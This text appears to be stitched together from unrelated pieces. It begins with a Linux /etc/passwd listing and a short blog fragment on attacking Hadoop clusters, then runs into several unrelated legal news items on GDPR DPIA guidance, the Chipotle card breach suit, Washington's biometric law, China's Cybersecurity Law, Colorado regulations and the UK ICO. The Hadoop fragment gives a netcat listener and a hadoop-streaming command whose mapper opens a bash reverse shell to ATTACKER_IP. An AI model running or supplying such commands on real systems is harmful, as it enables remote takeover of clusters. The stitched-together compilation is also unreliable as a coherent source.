daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
hduser:x:1000:1000:,,,:/home/hduser:/bin/bash



http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

This Hack.lu 2016 presentation walks you through how to get reverse shells or Meterpreter shells (on Windows) if you can run commands.
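
On Linux worker nodes the same idea works with a plain streaming job whose mapper calls back to you; a rough sketch (ATTACKER_IP and port 4444 are placeholders, and the /dev/tcp trick assumes bash is present on the NodeManagers):

# on your own machine, start a listener first
nc -lvnp 4444

# then submit a job whose mapper opens a reverse shell from a worker node
hadoop jar hadoop-streaming-2.7.3.jar \
  -input /tmp/a.txt -output rev_out \
  -mapper "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" \
  -reducer NONE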




Resources:
http://2015.zeronights.org/assets/files/03-Kaluzny.pdf

video of above talk from appsecEU 2015 https://www.youtube.com/watch?v=ClXKGI8AzTk
http://hackedexistence.com/downloads/Cloud_Security_in_Map_Reduce.pdf

https://media.blackhat.com/bh-us-10/presentations/Becherer/BlackHat-USA-2010-Becherer-Andrew-Hadoop-Security-slides.pdf 

https://securosis.com/assets/library/reports/Securing_Hadoop_Final_V2.pdf

https://github.com/CERT-W/hadoop-attack-library

https://www.sans.org/score/checklists/cloudera-security-hardening

http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

http://www.cloudera.com/documentation/enterprise/latest/topics/cdh_ig_ports_cdh5.html


What did I miss?  Anything to add?

CIPL Submits Comments to the Working Party’s Proposed GDPR DPIA Guidelines

The Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP recently submitted formal comments (“Comments”) to the Article 29 Working Party’s (“Working Party’s”) Guidelines on Data Protection Impact Assessment (DPIA) and determining whether processing is “likely to result in a high risk” for the purposes of Regulation 2016/679 (“DPIA Guidelines”) that were adopted on April 4, 2017. CIPL’s Comments follow its December 2016 white paper on Risk, High Risk, Risk Assessments and Data Protection Impact Assessments under the GDPR, which CIPL had submitted to the Working Party as formal initial input to its development of DPIAs and “high-risk” guidance.

CIPL’s Comments highlight the importance of preserving the DPIA’s special role as an accountability tool for high-risk processing under the EU General Data Protection Regulation (“GDPR”). CIPL acknowledges and appreciates the Working Party’s recognition that DPIAs and the notion of high risk are context specific and that organizations must have flexibility to devise risk assessment frameworks appropriate to them. To that effect, CIPL welcomes the Working Party’s inclusion of criteria for identifying high risk, as opposed to relying on a fixed list of high-risk processing activities.

CIPL’s Comments emphasize, however, that clarity is needed regarding several criteria put forward by the Working Party for determining whether a type of processing is high risk. This is especially true because such processing renders the DPIA requirement mandatory. CIPL’s Comments also recommend some additional elements for the Working Party to consider in the assessment of risk, including benefits of the processing and consent.

CIPL’s Comments also underline several key issues that it believes were insufficiently addressed by the DPIA Guidelines or which may require reconsideration, including:

  • the role of DPIAs in the context of joint data controllers and data processors, and the treatment of such entities’ intellectual property and confidential information;
  • data controllers’ reliance on existing DPIAs for newly implemented features or software across different products, and DPIAs for new technologies generally;
  • problems associated with several proposed “high-risk” criteria;
  • the importance of considering the benefits of processing in the context of DPIAs and risk assessments;
  • GDPR requirements where data controllers choose not to conduct a DPIA and instances where DPIAs are not required;
  • frequency of DPIAs and retiring existing DPIAs;
  • potential burdens imposed by seeking the views of data subjects and their representatives when carrying out a DPIA;
  • the roles of GDPR certifications, seals and marks, as well as BCRs and codes of conduct, when assessing the impact of a data processing operation;
  • the scope of rights to be included in a DPIA; and
  • burdens and risks associated with publishing DPIAs and the consequences of not publishing.

CIPL’s Comments were developed based on input by the private sector participants in CIPL’s ongoing GDPR Implementation Project, which includes more than 80 individual private sector organizations. As part of this initiative, CIPL will continue to provide formal input about other GDPR topics the Working Party prioritizes.

Chipotle Payment Card Data Breach: Financial Institutions File Leapfrog Suit

On May 26, 2017, Alcoa Community Federal Credit Union (“Alcoa”), on behalf of itself, credit unions, banks and other financial institutions, filed a nationwide class action against Chipotle Mexican Grill, Inc. (“Chipotle”). The case arises from a breach of customer payment card data. The putative class consists of all such financial institutions that issued payment cards, or were involved with card-issuing services, for customers who made purchases at Chipotle from March 1, 2017, to the present. Plaintiffs allege a number of “inadequate data security measures,” including Chipotle’s decision not to implement EMV technology. 

Alcoa asserts claims for negligence and negligence per se. Both claims rest on, among other bases, a purported violation of Section 5 of the FTC Act. Alcoa also requests declaratory and injunctive relief. The alleged damages include the costs of providing replacement cards, costs for consumer fraud monitoring, reimbursement of fraudulent charges, and costs due to lost interest and transaction fees due to reduced card usage.

Very few financial institution cases have been filed in the wake of consumer data breaches. However, such cases have been increasing due to a number of payment card data breaches in fairly rapid succession, including many massive breaches. These circumstances can create added costs for financial institutions that may not be fully recoverable through their direct relationships with the card brands. Additionally, because the financial institutions typically do not have contractual relationships with the breached merchants, some have chosen to leapfrog the various recovery processes established by the card brands by alleging non-contractual common law tort claims such as negligence and negligence per se.

Enterprise Security Weekly #47 – You Burn, You Learn

Corey Bodzin of Tenable joins us. In the news, the power of exploits, Carbon Black’s open letter to Cylance, security measures increase due to ransomware attacks, and more in this episode of Enterprise Security Weekly! Full Show Notes: https://wiki.securityweekly.com/ES_Episode47 Visit https://www.securityweekly.com for all the latest episodes!

Washington Becomes Third State to Enact Biometric Privacy Law

On May 16, 2017, the Governor of the State of Washington, Jay Inslee, signed into law House Bill 1493 (“H.B. 1493”), which sets forth requirements for businesses that collect and use biometric identifiers for commercial purposes. The law will become effective on July 23, 2017. With the enactment of H.B. 1493, Washington becomes the third state to pass legislation regulating the commercial use of biometric identifiers. Previously, Illinois and Texas enacted the Illinois Biometric Information Privacy Act (740 ILCS 14) (“BIPA”) and the Texas Statute on the Capture or Use of Biometric Identifier (Tex. Bus. & Com. Code Ann. §503.001), respectively.

H.B. 1493 defines “biometric identifier” as data generated by automatic measurements of an individual’s biological characteristics, such as a fingerprint, voiceprint, eye retinas, irises or other unique biological patterns or characteristics that are used to identify a specific individual. Interestingly, unlike the Illinois and Texas statutes, H.B. 1493’s definition of “biometric identifier” does not reference a record or scan of face geometry (i.e., facial recognition data). The definition also explicitly excludes “physical or digital photographs, video or audio recording or data generated therefrom,” and certain health-related data processed pursuant to the Health Insurance Portability and Accountability Act of 1996. Notably, several putative class action lawsuits have been filed against social networking sites, such as Shutterfly, for allegedly using facial recognition technology to scan users’ uploaded photographs in violation of BIPA’s notice and consent requirements. Although it is unclear whether H.B. 1493 covers scans of face geometry, the lack of explicit inclusion of such data may be a response to such lawsuits.

Pursuant to H.B. 1493, a person may not “enroll” a biometric identifier in a database for a commercial purpose without first providing notice, obtaining consent or providing a mechanism to prevent the subsequent use of a biometric identifier for a commercial purpose. In contrast to the Illinois and Texas statutes, which broadly regulate the capture (or, in the case of BIPA, the possession) of biometric identifiers, Washington’s statute is limited to those persons that “enroll” biometric identifiers by capturing the data, converting it into a reference template that cannot be reconstructed into the original output image, and storing it in a database that matches the biometric identifier to a specific individual. Notably, the statute’s limitations on disclosure and retention of biometric identifiers do not apply to biometric identifiers that have been “unenrolled.”

H.B. 1493 contains detailed requirements governing the enrollment of biometric identifiers for a commercial purpose, as well as the subsequent disclosure of such data. In particular:

  • The statute makes it clear that the notice required under the law is separate from, and is not considered, “affirmative consent.”
  • Unlike BIPA, which explicitly requires a written release from the subject before obtaining his or her biometric identifier, H.B. 1493 broadly states that the exact notice and type of consent required to achieve compliance is “context-dependent.” The notice must be given through a procedure reasonably designed to be readily available to affected individuals.
  • A person who enrolls a biometric identifier for a commercial purpose or obtains a biometric identifier from a third party for a commercial purpose may not use or disclose it in a manner that is materially inconsistent with the terms under which the biometric identifier was originally provided without obtaining consent for the new use or disclosure.
  • Unless consent has been obtained, a person who has enrolled an individual’s biometric identifier may not sell, lease or otherwise disclose the biometric identifier to another person for a commercial purpose unless one of certain enumerated statutory exceptions applies, including: (1) where necessary to provide a product or service requested by the individual; or (2) where disclosed to a third party who contractually promises that the biometric identifier will not be further disclosed and will not be enrolled in a database for a commercial purpose that is inconsistent with the notice and consent provided.

Importantly, unlike the Illinois and Texas statutes, H.B. 1493 contains a broad “security exception,” exempting those persons that collect, capture, enroll or store biometric identifiers in furtherance of a “security purpose.”

Similar to the Illinois and Texas statutes, H.B. 1493 also contains data security and retention requirements. In particular, the statute requires (1) reasonable care to guard against unauthorized access to and acquisition of biometric identifiers and (2) retention of biometric identifiers for no longer than necessary to comply with the law, protect against fraud, criminal activity, security threats or liability, or to provide the service for which the biometric identifier was enrolled.

As with the Texas biometric law, H.B. 1493 does not create a private right of action to allow for suits by individual plaintiffs. Instead, only the Washington Attorney General can enforce the requirements. The Illinois biometric law currently is the only state biometric statute that includes a private right of action.

Although Washington is only the third state to enact a biometric privacy law, several other states are considering similar legislation as the commercial collection and use of biometric identifiers becomes more commonplace.

Cybersecurity Law Goes Into Effect in China

On June 1, 2017, the new Cybersecurity Law went into effect in China. This post takes stock of (1) which measures have been passed so far, (2) which ones go into effect on June 1 and (3) which ones are in progress but have yet to be promulgated.

A draft implementing regulation and a draft technical guidance document on the treatment of cross-border transfers of personal information have been circulated, but at this time only the Cybersecurity Law itself and a relatively specific regulation (applicable to certain products and services used in network and information systems in relation to national security) have been finalized. As such, only the provisions of the Cybersecurity Law itself and this relatively specific regulation went into effect on June 1.

On June 1, 2017, the following obligations (among others) become legally mandatory for “network operators” and “providers of network products and services”:

  • personal information protection obligations, including notice and consent requirements;
  • for “network operators,” obligations to implement cybersecurity practices, such as designating personnel to be responsible for cybersecurity, and adopting contingency plans for cybersecurity incidents; and
  • for “providers of network products and services,” obligations to provide security maintenance for their products or services and to adopt remedial measures in case of safety defects in their products or services.

Penalties for violating the Cybersecurity Law can vary according to the specific violation, but typically include (1) a warning, an order to correct the violation, confiscation of illegal proceeds and/or a fine (typically ranging up to RMB 1 million); (2) personal fines for directly responsible persons (typically ranging up to RMB 100,000); and (3) in particularly serious circumstances, suspensions or shutdowns of offending websites and businesses, including revocations of operating permits and business licenses.

A final version of the draft implementing regulation and a draft technical guidance document on the treatment of cross-border transfers of personal information are forthcoming. When issued, they are expected to finalize and clarify the following prospective obligations:

  • restrictions on cross-border transfers of personal information (and “important information”), including a notice and consent obligation specific to cross-border transfers; and
  • procedures and standards for “security assessments,” which validate the continuation of cross-border transfers of personal information and “important information.”

The draft version of the implementing regulation on the treatment of cross-border transfers of personal information contains a grace period, under which “network operators” would not be required to comply with the cross-border transfer requirements until December 31, 2018. The final draft likely will contain a similar grace period.

Colorado Publishes Cybersecurity Regulations for Financial Institutions

Recently, the Colorado Division of Securities (the “Division”) published cybersecurity regulations for broker-dealers and investment advisers regulated by the Division. Colorado’s cybersecurity regulations follow similar regulations enacted in New York that apply to certain state-regulated financial institutions.

The regulations obligate covered broker-dealers and investment advisers to establish and maintain written cybersecurity procedures designed to protect “confidential personal information,” which is defined to include a Colorado resident’s first name or first initial and last name, plus (1) Social Security number; (2) driver’s license number or identification card number; (3) account number or credit or debit card number, in combination with any required security code, access code or password that would permit access to a resident’s financial account; (4) digitized or other electronic signature; or (5) user name, unique identifier or electronic mail address in combination with a password, access code, security question or other authentication information that would permit access to an online account.

The cybersecurity procedures must include:

  • an annual assessment by the firm or an agent of the firm of the potential risks and vulnerabilities to the confidentiality, integrity and availability of confidential personal information;
  • the use of secure email for email containing confidential personal information, including use of encryption and digital signatures;
  • authentication practices for employee access to electronic communications, databases and media;
  • procedures for authenticating client instructions received via electronic communication; and
  • disclosure to clients of the risks of using electronic communications.

In determining whether a firm’s cybersecurity procedures are reasonably designed, the Division may consider the firm’s size, relationships with third parties and cybersecurity policies and procedures. The Division may also consider the firm’s (1) authentication practices, (2) use of electronic communications, (3) use of automatic locking mechanisms for devices that have access to confidential personal information and (4) process for reporting lost or stolen devices.

The Colorado Secretary of State will set an effective date for the Colorado regulations after the Colorado Attorney General’s office issues an opinion on the regulations.

UK ICO Stresses Importance of Preparing for the GDPR and Addresses the ICO’s Role Post-Brexit

With just under one year to go before the EU General Data Protection Regulation (“GDPR”) becomes law across the European Union, the UK Information Commissioner’s Office (“ICO”) has continued its efforts to help businesses prepare for the new law. The ICO also has taken steps to address its own role post-Brexit.

In a YouTube video published on May 25, 2017, Information Commissioner Elizabeth Denham stressed the importance of preparing for the GDPR, warning that companies risk enforcement action, and the inevitable reputational and financial damage that follows, if they do not make data protection a cornerstone of their business policies and practices.

The ICO also published guidance materials for organizations grappling with the GDPR’s requirements. These include an updated (1) data protection self-assessment toolkit for small and medium-sized enterprises, which introduces an element aimed at helping organizations chart their GDPR compliance progress, and (2) “12 steps to take now” guidance.

On May 25, 2017, the ICO also unveiled its Information Rights Strategic Plan 2017-2021 (the “Plan”). The Plan outlines five goals:

  • increase the public’s trust and confidence in how data is used and made available;
  • improve standards of information rights practices through clear, inspiring and targeted engagement and influence;
  • maintain and develop influence within the global information rights regulatory community;
  • stay relevant, provide excellent public service and keep abreast of evolving technology; and
  • enforce the laws the ICO helps to shape and oversee.

Acknowledging that the ICO’s role within Europe will change when the UK leaves the European Union, bringing with it a number of challenges, the Plan nevertheless stresses that the ICO will continue to play a full part in EU data protection working groups and boards until Brexit. The ICO will also work closely with EU partners post-Brexit, including the European Data Protection Board (on which it will lose its seat). The ICO also pledges to work closely with the UK government to define its role in any transitional arrangements immediately following the UK’s departure from the EU.

The European Commission has also released a statement marking the GDPR’s one-year-to-go milestone. According to the statement, the European Commission pledges to work with EU Member States and engage with companies to ensure that individuals are aware of their rights and businesses are prepared for their new compliance obligations.